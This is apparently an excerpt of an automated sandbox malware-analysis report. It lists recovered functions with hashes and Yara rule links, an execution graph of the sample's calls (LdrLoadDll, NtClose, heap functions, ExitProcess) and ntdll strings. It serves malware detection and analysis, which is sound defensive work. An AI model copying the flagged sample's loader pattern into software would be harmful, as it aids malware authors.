                                          • Instruction ID: 0c19042e819cd791440895c9184f9568513172b0155a344da714e16d62143644
                                          • Opcode Fuzzy Hash: a21560cdd902751c2da5709bc446bb6c2adb99a9aea20d25ef2e08b42ef86294
                                          • Instruction Fuzzy Hash: 8A316B74D05218DFDBA4DF9AD9407EDBBF2FB89301F109069C609A3254EB745985CF50
                                          Function 06CD61AA Relevance: .1, Instructions: 94COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053333600.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6cd0000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d503b14b9a4e587e33e009f82110e8c444bc7ae84c36e97c6d284bfe53f01ab
                                          • Instruction ID: ff42b956f6a5f7a7aaf721173a83ecc4a941dca1cb5d213323a9dc039393c4df
                                          • Opcode Fuzzy Hash: 2d503b14b9a4e587e33e009f82110e8c444bc7ae84c36e97c6d284bfe53f01ab
                                          • Instruction Fuzzy Hash: 1831CFB0E05218CBEB98CFABD9487DDBBF2BB88304F14C16AD509AB254DB744985CF50
                                          Function 06A20007 Relevance: .1, Instructions: 90COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 352d2c0d50f35ccfba5f52f61ed366ed00033ccb085c2688ef5768135eb8a6f6
                                          • Instruction ID: 17517e93dfe8de781c83364fbf424a3b9c4a5834ff631af2ca0c36e111d106c8
                                          • Opcode Fuzzy Hash: 352d2c0d50f35ccfba5f52f61ed366ed00033ccb085c2688ef5768135eb8a6f6
                                          • Instruction Fuzzy Hash: 9941FC70D467588FEB19CF6B8C5478ABFF6AF86200F04C1EAD448AB265DB740A46CF51
                                          Function 06A20040 Relevance: .1, Instructions: 81COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: effbe2ef23ca0bd2278f23b63d66ee7589ecc89a50a83c5e700a9b03757ba31a
                                          • Instruction ID: 753d5ff0a87ba25fd5537a1523dadf8a4a1ecbc9049615463ab731aa08bfce98
                                          • Opcode Fuzzy Hash: effbe2ef23ca0bd2278f23b63d66ee7589ecc89a50a83c5e700a9b03757ba31a
                                          • Instruction Fuzzy Hash: 673175B0D41629CFEB68DF6BC94878AFAF6BF89304F14C1A9C40CA6254DB740A85CF51
                                          Function 06A2A7B8 Relevance: .1, Instructions: 71COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d376c9c07a7143cd3301363e0f6fec7430ffc239496a0c1ded8f07e9164b1a8
                                          • Instruction ID: b582aeb4a3825372127d1cb01431d1d01f44368ac8075e9c484765bf09664a78
                                          • Opcode Fuzzy Hash: 1d376c9c07a7143cd3301363e0f6fec7430ffc239496a0c1ded8f07e9164b1a8
                                          • Instruction Fuzzy Hash: 5431FCB1E456288FEB58DF6BC8446DAFBF7AFC9300F14C0AAD509A6215DB3049858F40
                                          Function 06A2A7A8 Relevance: .1, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3052795411.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6a20000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 803cc66dee9130ccd1670b8e70a00a02f651b472fd9a5205c0a7986d3388dddc
                                          • Instruction ID: 000fe7119899cef7c034bce1939f3d2928ba75b60b9818f91a07d33fc0b116fe
                                          • Opcode Fuzzy Hash: 803cc66dee9130ccd1670b8e70a00a02f651b472fd9a5205c0a7986d3388dddc
                                          • Instruction Fuzzy Hash: 1E210EB1E056589BEB58DF6B8C002DAFAF7AFC9300F14C0BAD948AA214DB7009858E51
                                          Function 06B55AD0 Relevance: 7.7, Strings: 6, Instructions: 151COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3053144322.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6b50000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                          • API String ID: 0-463314800
                                          • Opcode ID: b402712dfc76fc0aea69c1d2ec71a02da13b8aae1c465c9fac8889faa0871c56
                                          • Instruction ID: 3240f6d81d11b7440992eba635ecf7ddc90362da0e87d0eae16cdbaa05a0ebf3
                                          • Opcode Fuzzy Hash: b402712dfc76fc0aea69c1d2ec71a02da13b8aae1c465c9fac8889faa0871c56
                                          • Instruction Fuzzy Hash: E2519371A402058FC758EF69D950BAEBBEBBFC8300F14896CC44997365DF789906C7A1

                                          Execution Graph

                                          Execution Coverage:0.8%
                                          Dynamic/Decrypted Code Coverage:6.1%
                                          Signature Coverage:4%
                                          Total number of Nodes:99
                                          Total number of Limit Nodes:8
                                          execution_graph 94683 42fa43 94684 42f9b3 94683->94684 94686 42fa10 94684->94686 94689 42e953 94684->94689 94687 42f9ed 94692 42e873 94687->94692 94695 42cad3 94689->94695 94691 42e96e 94691->94687 94698 42cb23 94692->94698 94694 42e88c 94694->94686 94696 42caed 94695->94696 94697 42cafe RtlAllocateHeap 94696->94697 94697->94691 94699 42cb3d 94698->94699 94700 42cb4e RtlFreeHeap 94699->94700 94700->94694 94701 424b63 94702 424b7f 94701->94702 94703 424ba7 94702->94703 94704 424bbb 94702->94704 94705 42c7a3 NtClose 94703->94705 94711 42c7a3 94704->94711 94707 424bb0 94705->94707 94708 424bc4 94714 42e993 RtlAllocateHeap 94708->94714 94710 424bcf 94712 42c7bd 94711->94712 94713 42c7ce NtClose 94712->94713 94713->94708 94714->94710 94715 42bd63 94716 42bd7d 94715->94716 94719 12e2df0 LdrInitializeThunk 94716->94719 94717 42bda5 94719->94717 94788 424ef3 94793 424f0c 94788->94793 94789 424f99 94790 424f57 94791 42e873 RtlFreeHeap 94790->94791 94792 424f64 94791->94792 94793->94789 94793->94790 94794 424f94 94793->94794 94795 42e873 RtlFreeHeap 94794->94795 94795->94789 94796 42f913 94797 42f923 94796->94797 94798 42f929 94796->94798 94799 42e953 RtlAllocateHeap 94798->94799 94800 42f94f 94799->94800 94720 401b82 94721 401b87 94720->94721 94724 42fde3 94721->94724 94727 42e423 94724->94727 94728 42e449 94727->94728 94737 407523 94728->94737 94730 42e45f 94736 401c1c 94730->94736 94740 41b2b3 94730->94740 94732 42e47e 94733 42cb73 ExitProcess 94732->94733 94734 42e493 94732->94734 94733->94734 94751 42cb73 94734->94751 94754 4166a3 94737->94754 94739 407530 94739->94730 94741 41b2df 94740->94741 94772 41b1a3 94741->94772 94744 41b324 94746 41b340 94744->94746 94749 42c7a3 NtClose 94744->94749 94745 41b30c 94747 41b317 94745->94747 94748 42c7a3 NtClose 94745->94748 94746->94732 94747->94732 94748->94747 94750 41b336 94749->94750 94750->94732 94752 42cb90 94751->94752 94753 42cba1 ExitProcess 94752->94753 94753->94736 94755 4166bd 94754->94755 94757 4166d6 94755->94757 94758 42d223 94755->94758 94757->94739 94760 42d23d 94758->94760 94759 42d26c 94759->94757 94760->94759 94765 42bdb3 94760->94765 94763 42e873 RtlFreeHeap 94764 42d2e5 94763->94764 94764->94757 94766 42bdcd 94765->94766 94769 12e2c0a 94766->94769 94767 42bdf9 94767->94763 94770 12e2c1f LdrInitializeThunk 94769->94770 94771 12e2c11 94769->94771 94770->94767 94771->94767 94773 41b1bd 94772->94773 94777 41b299 94772->94777 94778 42be53 94773->94778 94776 42c7a3 NtClose 94776->94777 94777->94744 94777->94745 94779 42be6d 94778->94779 94782 12e35c0 LdrInitializeThunk 94779->94782 94780 41b28d 94780->94776 94782->94780 94783 417983 94784 4179a7 94783->94784 94785 4179e3 LdrLoadDll 94784->94785 94786 4179ae 94784->94786 94785->94786 94806 413ef3 94810 413f10 94806->94810 94808 413f6c 94809 413f76 94810->94809 94811 41b5c3 RtlFreeHeap LdrInitializeThunk 94810->94811 94811->94808 94787 12e2b60 LdrInitializeThunk

                                          Executed Functions

                                          Function 00417983 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 32 417983-41799f 33 4179a7-4179ac 32->33 34 4179a2 call 42f453 32->34 35 4179b2-4179c0 call 42fa53 33->35 36 4179ae-4179b1 33->36 34->33 39 4179d0-4179e1 call 42def3 35->39 40 4179c2-4179cd call 42fcf3 35->40 45 4179e3-4179f5 LdrLoadDll 39->45 46 4179fa-4179fd 39->46 40->39 47 4179f7 45->47 47->46
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004179F5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
                                          • Instruction ID: 2272e45357e1b8a5eef0063927663549135e1288739789d900d719aea6b3099d
                                          • Opcode Fuzzy Hash: 919664c6ec93289ae22f137e9bf50d951b2176283fe432a251c119e73e98b3ef
                                          • Instruction Fuzzy Hash: C00112B5E0020DABDB10DAA5DC42FDEB778AB54308F4081A6E90897240F675EB588795
                                          Function 0042C7A3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 53 42c7a3-42c7dc call 4048f3 call 42da03 NtClose
                                          APIs
                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7D7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 36e5aa6e06a6865421a501a8efbc971ace10677f283fac51b5c3a6700c8166c7
                                          • Instruction ID: c068b07e7c5f5f25d136ae17d6bddc0cdf0b8edc256bca3c504a9b7e04cf088e
                                          • Opcode Fuzzy Hash: 36e5aa6e06a6865421a501a8efbc971ace10677f283fac51b5c3a6700c8166c7
                                          • Instruction Fuzzy Hash: 11E046762042147BE620AA6ADC41F9B776CEFC5714F00842AFA08A7241CA76B91187F8
                                          Function 012E2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 67 12e2b60-12e2b6c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: af671bcbb2bec84f81f5e69facda35edfac6e26bcfae8996cd2a21a8dbef4f66
                                          • Instruction ID: d854cbd88b64d400967c32a13373ecf20a017edcf4d312a0d60838775308858a
                                          • Opcode Fuzzy Hash: af671bcbb2bec84f81f5e69facda35edfac6e26bcfae8996cd2a21a8dbef4f66
                                          • Instruction Fuzzy Hash: 1990026121240003450571584414616C00AD7E1201F55C035E3014590DC625C9A56225
                                          Function 012E2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 69 12e2df0-12e2dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d1e7cdaae5709b96a16d62c9888541b7c2ab683c3a420147df43b7e30e1d4e8e
                                          • Instruction ID: 564b9e923b55c2217a6c61bbe1205c02219ab865aba90b255707bfa866606617
                                          • Opcode Fuzzy Hash: d1e7cdaae5709b96a16d62c9888541b7c2ab683c3a420147df43b7e30e1d4e8e
                                          • Instruction Fuzzy Hash: A790023121140413D511715845047078009D7D1241F95C426A2424558DD756CA66A221
                                          Function 012E2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 68 12e2c70-12e2c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 63bf733f8ac9e5e0d944d3d7709b08a8017a4ce9443961fa0bc72882d7ca6900
                                          • Instruction ID: 2e933515106f96864574be3d2b07d2b4ecb44796ab80b39e3106511f8deb435e
                                          • Opcode Fuzzy Hash: 63bf733f8ac9e5e0d944d3d7709b08a8017a4ce9443961fa0bc72882d7ca6900
                                          • Instruction Fuzzy Hash: 8090023121148802D5107158840474A8005D7D1301F59C425A6424658DC795C9A57221
                                          Function 012E35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 70 12e35c0-12e35cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1adc4b41a7f50b7f9a8f17c0c8db4e518099f13322cba43bf96e3b26690eb377
                                          • Instruction ID: 4902ea48382d392a7f83eda43a51edc9f6d996a62c29c32a7470489e9bdaef28
                                          • Opcode Fuzzy Hash: 1adc4b41a7f50b7f9a8f17c0c8db4e518099f13322cba43bf96e3b26690eb377
                                          • Instruction Fuzzy Hash: DF90023161550402D500715845147069005D7D1201F65C425A2424568DC795CA6566A2
                                          Function 0042CB23 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 42cb23-42cb64 call 4048f3 call 42da03 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CB5F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: 1gA
                                          • API String ID: 3298025750-4052736723
                                          • Opcode ID: 0b9c64c89bd8e8e46414c8097e5b75ef52ce40fc719733ff23b7b54767d60661
                                          • Instruction ID: 3db9d38b6c099dfd2cf4dce0f204b55713b22ea5661551a61eb9de621a3d7ce5
                                          • Opcode Fuzzy Hash: 0b9c64c89bd8e8e46414c8097e5b75ef52ce40fc719733ff23b7b54767d60661
                                          • Instruction Fuzzy Hash: CFE09276208604BBD610EE99DC45FDB37ADEFC9714F004419FA08A7241D671B91187B4
                                          Function 0042CAD3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 48 42cad3-42cb14 call 4048f3 call 42da03 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,0041E73B,?,?,00000000,?,0041E73B,?,?,?), ref: 0042CB0F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5f4595f409b0a238fc68096f1e2163fd5f9118da07220293d69c765325efb063
                                          • Instruction ID: 1cc8bddffe364a191cc507c297a67581dd259309c4f7cb3357891730a1f7528c
                                          • Opcode Fuzzy Hash: 5f4595f409b0a238fc68096f1e2163fd5f9118da07220293d69c765325efb063
                                          • Instruction Fuzzy Hash: EDE092B6608244BBD610EFA9EC41FDB33ACEFC5714F004419F908A7241CA71B9118BB4
                                          Function 0042CB73 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 58 42cb73-42cbaf call 4048f3 call 42da03 ExitProcess
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500256571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: d8368835974c325c49e4badbc378e576f0341e2ec1d321e659ceb712fa60f3df
                                          • Instruction ID: b8e24616ca6c070d3f9d53c64f91f6f12713fa84a05849ca7b521decef18237f
                                          • Opcode Fuzzy Hash: d8368835974c325c49e4badbc378e576f0341e2ec1d321e659ceb712fa60f3df
                                          • Instruction Fuzzy Hash: E2E046362043547BD220BA5ADC02F9BB7ACDFC5714F00442AFA08A7241CBB2B91087B4
                                          Function 012E2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 63 12e2c0a-12e2c0f 64 12e2c1f-12e2c26 LdrInitializeThunk 63->64 65 12e2c11-12e2c18 63->65
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 30ddca1165c0f8dda7b3accc98bb62900dba8ffe40e1f0962c3b971daed9a668
                                          • Instruction ID: bdb1a76d646617036db8a17a5c5a6ef7d99fc6ef314a54929e823e338f92a8fc
                                          • Opcode Fuzzy Hash: 30ddca1165c0f8dda7b3accc98bb62900dba8ffe40e1f0962c3b971daed9a668
                                          • Instruction Fuzzy Hash: F3B09B719115D5C5DE11E764460C717B954B7D1701F56C075D3030641F4738C1E5E375

                                          Non-executed Functions

                                          Function 01322349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: 046ed2de270cc60cc86908c1f3e893ba628eb389c29d431adfdf33920e67ee92
                                          • Instruction ID: eb81a0730bbe03b3c78059ef219e06457259a2aed369ef6007e34fa0fe60b41a
                                          • Opcode Fuzzy Hash: 046ed2de270cc60cc86908c1f3e893ba628eb389c29d431adfdf33920e67ee92
                                          • Instruction Fuzzy Hash: 35929F71618352AFE721EF28CC80B6BB7E8BB88758F04491DFA95D7251D770E844CB92
                                          Function 012D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                          Download Yara Rule
                                          Strings
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013154E2
                                          • Critical section debug info address, xrefs: 0131541F, 0131552E
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013154CE
                                          • Critical section address., xrefs: 01315502
                                          • Address of the debug info found in the active list., xrefs: 013154AE, 013154FA
                                          • corrupted critical section, xrefs: 013154C2
                                          • Thread identifier, xrefs: 0131553A
                                          • 8, xrefs: 013152E3
                                          • Invalid debug info address of this critical section, xrefs: 013154B6
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01315543
                                          • undeleted critical section in freed memory, xrefs: 0131542B
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0131540A, 01315496, 01315519
                                          • Critical section address, xrefs: 01315425, 013154BC, 01315534
                                          • double initialized or corrupted critical section, xrefs: 01315508
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: abec0c021d4d4f995282eec9352df840bc5930b8fe21701f9b8a967ab17feefa
                                          • Instruction ID: 56cb84cb9e72c09f89ef05a98c2cdd8178365a2c3f3af90966f42d9c79f431ad
                                          • Opcode Fuzzy Hash: abec0c021d4d4f995282eec9352df840bc5930b8fe21701f9b8a967ab17feefa
                                          • Instruction Fuzzy Hash: EB81CCB1A41348EFDB24CF99C845FAEBBB9FB49718F504119F605B7680D3B1A940CBA0
                                          Function 012D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01312409
                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0131261F
                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01312602
                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01312498
                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013124C0
                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01312624
                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01312506
                                          • @, xrefs: 0131259B
                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013122E4
                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013125EB
                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01312412
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                          • API String ID: 0-4009184096
                                          • Opcode ID: ff18643b5553fecfe27772586a3cf270e14250e03387098073ed402eacd37f54
                                          • Instruction ID: a31fdb944eb192c0397c183f4025b83c5e391ecc612e30d5f64c7b95bf586b44
                                          • Opcode Fuzzy Hash: ff18643b5553fecfe27772586a3cf270e14250e03387098073ed402eacd37f54
                                          • Instruction Fuzzy Hash: 6A027EB1D10229DFDB21DB54CC81BEAB7B8AB54704F1141DAE609B7241EB70AE84CF69
                                          Function 01350274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: 3b33c515fbf47c20c33ce977e4c9c0b5fcbb0dd2fceb10aa7fc428beb21d95ee
                                          • Instruction ID: 1641aa78ba6f4f22fafd13e0b59733f7d6837cfd04bbe3e65593f6c05be9e137
                                          • Opcode Fuzzy Hash: 3b33c515fbf47c20c33ce977e4c9c0b5fcbb0dd2fceb10aa7fc428beb21d95ee
                                          • Instruction Fuzzy Hash: DFD1DC31620686DFDB6ADF6CC440EAEBBF1FF49B18F088459F8459B652C7369981CB10
                                          Function 013289B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                          Download Yara Rule
                                          Strings
                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01328A3D
                                          • VerifierFlags, xrefs: 01328C50
                                          • AVRF: -*- final list of providers -*- , xrefs: 01328B8F
                                          • VerifierDlls, xrefs: 01328CBD
                                          • VerifierDebug, xrefs: 01328CA5
                                          • HandleTraces, xrefs: 01328C8F
                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01328A67
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.2500494014.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_1270000_file.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                          • API String ID: 0-3223716464
